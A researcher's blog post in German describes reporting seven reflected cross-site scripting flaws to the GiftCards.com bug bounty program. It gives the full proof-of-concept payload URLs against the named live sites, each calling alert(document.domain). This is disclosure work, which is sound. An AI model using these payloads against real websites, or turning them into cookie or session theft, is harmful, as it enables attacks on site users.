• Home
  • References
  • Wiki
  • About me
  • Imprint

Feb 18: My experiences with the GiftCards.com Bug Bounty Program

Since November 2013 I reported seven Cross-site Scripting vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of them wasn’t a duplicate :-/. Strange? Perhaps, but not impossible given the simplicity of the vulnerabilities.
 
But, what I really don’t understand: Why do they still work until today?
 
 
11/17/2013 Vulnerability #1: (DUP)
 
// Reflected Cross-site Scripting
 
http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//

// Original advisory

http://insight-labs.org/?p=738
 
 
11/17/2013 Vulnerability #2: - OK – Reward or not ;-)
 
// Reflected Cross-site Scripting (tested with FF 25.0.1)
 
http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

// Original Advisory

http://inj3ct0rs.com/exploit/description/19711
 
 
11/21/2013 Vulnerability #3: (DUP)
 
// Reflected Cross-site Scripting with SWF-Files (tested on Firefox 25.0.1)
 
http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=
javascript:alert(document.domain);

 
 
11/26/2013 Vulnerability #4: (DUP)
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>
 
 
12/05/2013 Vulnerability #5:
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>
 
 
 
12/05/2013 Vulnerability #6:
 
// Reflected Cross-site Scripting with IE10
 
https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>
 
 
12/05/2013 Vulnerability #7:
 
// Reflected Cross-site Scripting with IE10
 
http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>
 
 
Geschrieben von Stefan Schurtz in Bug Bounty Kommentare: (0) Trackbacks: (0)
Tags für diesen Artikel: advisory, bug bounty, cross site scripting, security, sicherheit, xss
Zuletzt bearbeitet am 18.02.2014 07:05

Trackbacks
Trackback-URL für diesen Eintrag

Keine Trackbacks

Kommentare
Ansicht der Kommentare: (Linear | Verschachtelt)

Noch keine Kommentare


Kommentar schreiben


Um maschinelle und automatische Übertragung von Spamkommentaren zu verhindern, bitte die Zeichenfolge im dargestellten Bild in der Eingabemaske eintragen. Nur wenn die Zeichenfolge richtig eingegeben wurde, kann der Kommentar angenommen werden. Bitte beachten Sie, dass Ihr Browser Cookies unterstützen muss, um dieses Verfahren anzuwenden.
CAPTCHA 1CAPTCHA 2CAPTCHA 3CAPTCHA 4CAPTCHA 5


Textile-Formatierung erlaubt
Sie können [geshi lang=LANG][/lang] Tags verwenden um Quellcode abhängig von der gewählten Programmiersprache einzubinden
 
Kommentare werden erst nach redaktioneller Prüfung freigeschaltet!
 

Kalender

Zurück February '19
Mo Tu We Th Fr Sa Su
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28      

Suche

Categories

  • XML Allgemein
  • XML Bug Bounty
  • XML Cisco
  • XML Coding
  • XML Fachartikel
  • XML Forensics
  • XML Hacking Challenge
  • XML IT-Security
  • XML Kryptographie
  • XML Network Monitoring
  • XML OpenBSD
  • XML Reverse Engineering
  • XML Security Advisories
  • XML Steganographie


Alle Kategorien

taggs

xml ACL xml advisory xml apple.com xml artikel xml backdoor xml buffer overflow xml bug bounty xml bypass xml challenges xml cheat sheet xml check point xml Cisco xml coding xml cross site request forgery xml cross site scripting xml dcfldd xml directory traversal xml diskinternals xml dos xml forensics xml full path disclosure xml heise xml html5 xml http xml HTTPS xml infoserve xml IPv6 xml lfi xml linux reader xml markplaats.nl xml metasploit xml nagios xml nessus xml omniture xml OpenBSD xml open redirection xml OpenSSH xml owasp xml reverse engineering xml RIPv2 xml saar xml saarland xml security xml Sicherheit xml SNMP xml sql injection xml steganographie xml store.apple.com xml sven xml xss

Exploit-DB updates by Offensive Security

[remote] Belkin Wemo UPnP - Remote Code Execution (Metasploit)

Wednesday, February 20. 2019
[dos] MatrixSSL < 4.0.2 - Stack Buffer Overflow Verifying x.509 Certificates

Wednesday, February 20. 2019
[dos] Android Kernel < 4.8 - ptrace seccomp Filter Bypass

Wednesday, February 20. 2019
[dos] FaceTime - Texture Processing Memory Corruption

Wednesday, February 20. 2019
[dos] WinRAR 5.61 - '.lng' Denial of Service

Wednesday, February 20. 2019

OpenBSD Journal

Faster vlan(4) forwarding? - blog post by mpi@

Tuesday, February 19. 2019
openrsync imported into the tree

Monday, February 11. 2019
Florian Obser on unwind(8)

Monday, January 28. 2019
Security Vulnerability Mitigations

Saturday, January 26. 2019
Support for 2TB of memory added

Monday, January 21. 2019
join-ing any open wifi network is now possible

Sunday, January 20. 2019
vmm(4) for i386 deleted from -current

Sunday, January 20. 2019
OpenBSD on the Acer Aspire One, At Ten

Sunday, January 20. 2019
New console font Spleen made default

Thursday, January 10. 2019

Archives

  • February 2019
  • January 2019
  • December 2018
  • Das Neueste ...
  • Älteres ...

Verwaltung des Blogs

Login

Syndicate This Blog

  • XML RSS 0.91 feed
  • XML RSS 1.0 feed
  • XML RSS 2.0 feed
  • ATOM/XML ATOM 1.0 feed
  • XML RSS 2.0 Kommentare
 

Layout by Andreas Viklund | Serendipity template by Carl